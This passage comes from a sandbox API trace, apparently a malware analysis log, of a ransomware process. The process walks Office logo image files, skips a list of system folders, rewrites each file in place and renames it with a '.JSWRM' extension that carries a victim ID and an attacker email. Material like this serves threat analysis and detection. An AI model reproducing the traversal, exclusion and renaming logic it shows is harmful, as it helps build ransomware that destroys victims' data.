nFileSizeHigh=0x0, nFileSizeLow=0xd4f, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="WinWordLogo.contrast-white_scale-180.png", cAlternateFileName="WINWOR~1.PNG")) returned 1 [0134.310] lstrcmpiW (lpString1="WinWordLogo.contrast-white_scale-180.png", lpString2=".") returned 1 [0134.310] lstrcmpiW (lpString1="WinWordLogo.contrast-white_scale-180.png", lpString2="..") returned 1 [0134.310] lstrcmpiW (lpString1="WinWordLogo.contrast-white_scale-180.png", lpString2="...") returned 1 [0134.310] lstrcmpiW (lpString1="WinWordLogo.contrast-white_scale-180.png", lpString2="windows") returned 1 [0134.310] lstrcmpiW (lpString1="WinWordLogo.contrast-white_scale-180.png", lpString2="recovery") returned 1 [0134.310] lstrcmpiW (lpString1="WinWordLogo.contrast-white_scale-180.png", lpString2="perflogs") returned 1 [0134.310] lstrcmpiW (lpString1="WinWordLogo.contrast-white_scale-180.png", lpString2="documents and settings") returned 1 [0134.310] lstrcmpiW (lpString1="WinWordLogo.contrast-white_scale-180.png", lpString2="$RECYCLE.BIN") returned 1 [0134.310] lstrcmpiW (lpString1="WinWordLogo.contrast-white_scale-180.png", lpString2="system volume information") returned 1 [0134.310] lstrcmpiW (lpString1="WinWordLogo.contrast-white_scale-180.png", lpString2="msocache") returned 1 [0134.310] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ce8 [0134.310] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinWordLogo.contrast-white_scale-180.png", cchWideChar=40, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 40 [0134.310] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0134.310] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinWordLogo.contrast-white_scale-180.png", cchWideChar=40, lpMultiByteStr=0x22cdc8, cbMultiByte=40, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WinWordLogo.contrast-white_scale-180.png", lpUsedDefaultChar=0x0) returned 40 [0134.310] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ce8 | out: hHeap=0x1e0000) returned 1 [0134.310] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c80 [0134.310] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinWordLogo.contrast-white_scale-180.png", cchWideChar=40, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 40 [0134.310] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0134.310] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinWordLogo.contrast-white_scale-180.png", cchWideChar=40, lpMultiByteStr=0x22ce70, cbMultiByte=40, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WinWordLogo.contrast-white_scale-180.png", lpUsedDefaultChar=0x0) returned 40 [0134.310] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c80 | out: hHeap=0x1e0000) returned 1 [0134.310] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22e358 [0134.310] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22dd70 | out: hHeap=0x1e0000) returned 1 [0134.310] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0134.310] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0134.310] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22dd70 [0134.311] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinWordLogo.contrast-white_scale-180.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winwordlogo.contrast-white_scale-180.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0134.311] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3407) returned 1 [0134.311] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.311] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd40) returned 0x24e1d8 [0134.311] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0xd40, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0xd40, lpOverlapped=0x0) returned 1 [0134.313] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.313] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0xd40, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0xd40, lpOverlapped=0x0) returned 1 [0134.313] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0134.313] CloseHandle (hObject=0x238) returned 1 [0134.313] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22df20 [0134.313] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0134.313] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0134.313] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0134.313] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0134.313] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0134.313] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0134.313] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a408 [0134.314] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a408, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0134.314] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a408 | out: hHeap=0x1e0000) returned 1 [0134.314] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22ae28 [0134.314] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0134.314] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ae28 | out: hHeap=0x1e0000) returned 1 [0134.314] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0134.314] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinWordLogo.contrast-white_scale-180.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winwordlogo.contrast-white_scale-180.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinWordLogo.contrast-white_scale-180.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winwordlogo.contrast-white_scale-180.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0134.315] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0134.315] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22df20 | out: hHeap=0x1e0000) returned 1 [0134.315] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22dd70 | out: hHeap=0x1e0000) returned 1 [0134.315] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0134.315] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0134.315] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a7e29bd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a7e29bd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a7e29bd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x806, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="WinWordLogo.contrast-white_scale-80.png", cAlternateFileName="WINWOR~3.PNG")) returned 1 [0134.315] lstrcmpiW (lpString1="WinWordLogo.contrast-white_scale-80.png", lpString2=".") returned 1 [0134.315] lstrcmpiW (lpString1="WinWordLogo.contrast-white_scale-80.png", lpString2="..") returned 1 [0134.315] lstrcmpiW (lpString1="WinWordLogo.contrast-white_scale-80.png", lpString2="...") returned 1 [0134.315] lstrcmpiW (lpString1="WinWordLogo.contrast-white_scale-80.png", lpString2="windows") returned 1 [0134.315] lstrcmpiW (lpString1="WinWordLogo.contrast-white_scale-80.png", lpString2="recovery") returned 1 [0134.315] lstrcmpiW (lpString1="WinWordLogo.contrast-white_scale-80.png", lpString2="perflogs") returned 1 [0134.315] lstrcmpiW (lpString1="WinWordLogo.contrast-white_scale-80.png", lpString2="documents and settings") returned 1 [0134.315] lstrcmpiW (lpString1="WinWordLogo.contrast-white_scale-80.png", lpString2="$RECYCLE.BIN") returned 1 [0134.315] lstrcmpiW (lpString1="WinWordLogo.contrast-white_scale-80.png", lpString2="system volume information") returned 1 [0134.315] lstrcmpiW (lpString1="WinWordLogo.contrast-white_scale-80.png", lpString2="msocache") returned 1 [0134.315] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0134.315] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinWordLogo.contrast-white_scale-80.png", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0134.315] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0134.315] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinWordLogo.contrast-white_scale-80.png", cchWideChar=39, lpMultiByteStr=0x22d0d8, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WinWordLogo.contrast-white_scale-80.png", lpUsedDefaultChar=0x0) returned 39 [0134.315] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0134.315] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c698 [0134.315] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinWordLogo.contrast-white_scale-80.png", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0134.316] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0134.316] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinWordLogo.contrast-white_scale-80.png", cchWideChar=39, lpMultiByteStr=0x22d260, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WinWordLogo.contrast-white_scale-80.png", lpUsedDefaultChar=0x0) returned 39 [0134.316] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c698 | out: hHeap=0x1e0000) returned 1 [0134.316] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22ea18 [0134.316] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22e358 | out: hHeap=0x1e0000) returned 1 [0134.316] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0134.316] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0134.316] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f1b0 [0134.316] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinWordLogo.contrast-white_scale-80.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winwordlogo.contrast-white_scale-80.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0134.317] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2054) returned 1 [0134.317] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.317] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x800) returned 0x20c6c0 [0134.317] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x800, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x800, lpOverlapped=0x0) returned 1 [0134.318] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.318] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x800, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x800, lpOverlapped=0x0) returned 1 [0134.318] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20c6c0 | out: hHeap=0x1e0000) returned 1 [0134.318] CloseHandle (hObject=0x238) returned 1 [0134.319] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f0d8 [0134.319] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0134.319] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0134.319] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0134.319] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0134.319] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0134.319] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0134.319] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0134.319] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0134.319] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0134.319] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22e358 [0134.319] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x136) returned 0x24f350 [0134.319] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22e358 | out: hHeap=0x1e0000) returned 1 [0134.319] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0134.319] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinWordLogo.contrast-white_scale-80.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winwordlogo.contrast-white_scale-80.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinWordLogo.contrast-white_scale-80.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winwordlogo.contrast-white_scale-80.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0134.320] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24f350 | out: hHeap=0x1e0000) returned 1 [0134.320] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f0d8 | out: hHeap=0x1e0000) returned 1 [0134.320] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f1b0 | out: hHeap=0x1e0000) returned 1 [0134.320] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0134.320] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0134.320] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a8a15c5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a8a15c5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a8a15c5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x94f, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="WinWordLogo.scale-100.png", cAlternateFileName="WIEE7A~1.PNG")) returned 1 [0134.320] lstrcmpiW (lpString1="WinWordLogo.scale-100.png", lpString2=".") returned 1 [0134.320] lstrcmpiW (lpString1="WinWordLogo.scale-100.png", lpString2="..") returned 1 [0134.320] lstrcmpiW (lpString1="WinWordLogo.scale-100.png", lpString2="...") returned 1 [0134.320] lstrcmpiW (lpString1="WinWordLogo.scale-100.png", lpString2="windows") returned 1 [0134.320] lstrcmpiW (lpString1="WinWordLogo.scale-100.png", lpString2="recovery") returned 1 [0134.320] lstrcmpiW (lpString1="WinWordLogo.scale-100.png", lpString2="perflogs") returned 1 [0134.320] lstrcmpiW (lpString1="WinWordLogo.scale-100.png", lpString2="documents and settings") returned 1 [0134.321] lstrcmpiW (lpString1="WinWordLogo.scale-100.png", lpString2="$RECYCLE.BIN") returned 1 [0134.321] lstrcmpiW (lpString1="WinWordLogo.scale-100.png", lpString2="system volume information") returned 1 [0134.321] lstrcmpiW (lpString1="WinWordLogo.scale-100.png", lpString2="msocache") returned 1 [0134.321] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d890 [0134.321] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinWordLogo.scale-100.png", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0134.321] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0134.321] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinWordLogo.scale-100.png", cchWideChar=25, lpMultiByteStr=0x2411c8, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WinWordLogo.scale-100.png", lpUsedDefaultChar=0x0) returned 25 [0134.321] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d890 | out: hHeap=0x1e0000) returned 1 [0134.321] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0134.321] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinWordLogo.scale-100.png", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0134.321] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0134.321] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinWordLogo.scale-100.png", cchWideChar=25, lpMultiByteStr=0x240f48, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WinWordLogo.scale-100.png", lpUsedDefaultChar=0x0) returned 25 [0134.321] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0134.321] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0134.321] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ea18 | out: hHeap=0x1e0000) returned 1 [0134.321] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0134.321] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0134.321] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236970 [0134.321] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinWordLogo.scale-100.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winwordlogo.scale-100.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0134.322] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2383) returned 1 [0134.322] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.322] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x940) returned 0x20c6c0 [0134.322] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x940, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x940, lpOverlapped=0x0) returned 1 [0134.482] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.482] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x940, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x940, lpOverlapped=0x0) returned 1 [0134.482] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20c6c0 | out: hHeap=0x1e0000) returned 1 [0134.482] CloseHandle (hObject=0x238) returned 1 [0134.482] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2362f8 [0134.482] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0134.482] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0134.482] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0134.482] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0134.482] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0134.482] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0134.482] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a480 [0134.482] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a480, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0134.482] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a480 | out: hHeap=0x1e0000) returned 1 [0134.482] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b2b8 [0134.482] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23ede0 [0134.483] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b2b8 | out: hHeap=0x1e0000) returned 1 [0134.483] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0134.483] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinWordLogo.scale-100.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winwordlogo.scale-100.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinWordLogo.scale-100.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winwordlogo.scale-100.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0134.485] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ede0 | out: hHeap=0x1e0000) returned 1 [0134.485] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2362f8 | out: hHeap=0x1e0000) returned 1 [0134.485] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236970 | out: hHeap=0x1e0000) returned 1 [0134.485] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0134.485] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0134.485] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, 